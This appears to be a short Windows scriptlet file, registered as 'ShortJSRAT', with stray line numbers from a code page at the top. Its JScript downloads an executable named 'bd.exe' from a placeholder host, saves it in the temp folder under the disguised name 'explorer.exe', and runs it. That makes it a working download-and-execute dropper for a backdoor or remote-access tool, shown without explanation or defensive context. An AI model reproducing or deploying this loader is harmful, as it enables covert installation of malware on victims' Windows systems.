1 | var WSHShell = new ActiveXObject("WScript.Shell"); |
SCT:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://x.x.x.x/bd.exe", false);
xhr.send();
if (xhr.Status == 200) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1;
stream.Write(xhr.ResponseBody);
stream.Position = 0;
if (fso.FileExists(filepath)){
fso.DeleteFile(filepath);
}
stream.SaveToFile(filepath);
stream.Close();
new ActiveXObject("WScript.Shell").Exec(filepath);
}
]]>
</script>
</registration>
</scriptlet>